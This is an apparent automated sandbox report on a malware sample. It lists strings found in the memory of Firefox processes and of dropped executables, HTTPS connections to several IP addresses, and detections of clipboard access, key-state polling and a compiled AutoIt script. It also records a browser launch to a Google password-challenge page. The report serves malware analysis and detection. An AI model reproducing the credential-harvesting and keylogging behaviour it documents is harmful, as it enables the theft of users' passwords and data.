Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000018.00000002.2881483129.000002BA634F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA637D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889075369.00002786E1B04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63756000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797999061.000002BA55DE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2781567528.000000D7800BC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000018.00000003.2742255243.000002BA5A163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: ae5cfd188c.exe, 00000007.00000003.2546663307.0000000005715000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A429000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000018.00000002.2794739483.000002BA5544E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: ae5cfd188c.exe, 00000007.00000003.2546663307.0000000005715000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000018.00000002.2794739483.000002BA5544E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/s
Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885242531.000010DF2E030000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000018.00000002.2795803239.000002BA555DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/4
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A70A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61988000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000018.00000002.2864606177.000002BA5D4EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BECB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791688549.000002BA49A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791760719.000002BA49A19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA55443000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2731037127.000002BA5C0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F1A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784518284.000001B8C5114000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781901454.000001AF5A3B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000016.00000002.2642169411.000001D3456C7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2652441512.000001BD98D80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791760719.000002BA49A19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000018.00000002.2793027167.000002BA4B4E2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2793027167.000002BA4B4BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784518284.000001B8C5114000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781901454.000001AF5A3B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2782554796.000001AF5A544000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: 2ada66c192.exe, 0000000B.00000003.2692799251.0000000001092000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2690178414.000000000108D000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000002.2697938782.0000000001096000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2694374109.0000000001092000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwde
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49790 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49852 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49880 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49897 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49898 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_006EEAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 11_2_006EED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 11_2_006EEAFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_006DAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 11_2_006DAA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe Code function: 11_2_00709576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 11_2_00709576

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 2ada66c192.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_47284277-4
Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 